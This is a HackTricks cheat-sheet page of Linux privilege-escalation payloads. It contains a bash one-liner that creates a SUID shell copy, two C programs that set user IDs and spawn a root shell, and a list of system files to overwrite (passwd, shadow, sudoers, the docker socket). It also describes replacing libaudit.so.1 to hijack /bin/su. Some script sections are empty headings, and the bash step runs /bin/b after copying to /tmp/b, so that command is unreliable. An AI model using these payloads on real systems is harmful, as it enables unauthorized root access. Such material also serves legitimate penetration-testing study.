Edit

Payloads to execute

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

//gcc payload.c -o payload
int main(void){
    setresuid(0, 0, 0); //Set as user suid user
    system("/bin/sh");
    return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}

Overwriting a file to escalate privileges

Common files

  • Add user with password to /etc/passwd

  • Change password inside /etc/shadow

  • Add user to sudoers in /etc/sudoers

  • Abuse docker through the docker socket, usually in /run/docker.sock or /var/run/docker.sock

Overwriting a library

Check a library used by some binary, in this case /bin/su:

In this case lets try to impersonate /lib/x86_64-linux-gnu/libaudit.so.1. So, check for functions of this library used by the su binary:

The symbols audit_open, audit_log_acct_message, audit_log_acct_message and audit_fd are probably from the libaudit.so.1 library. As the libaudit.so.1 will be overwritten by the malicious shared library, these symbols should be present in the new shared library, otherwise the program will not be able to find the symbol and will exit.

Now, just calling /bin/su you will obtain a shell as root.

Scripts

Can you make root execute something?

www-data to sudoers

Change root password

Add new root user to /etc/passwd

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
PreviousNode inspector/CEF debug abuseNextRunC Privilege Escalation

Last updated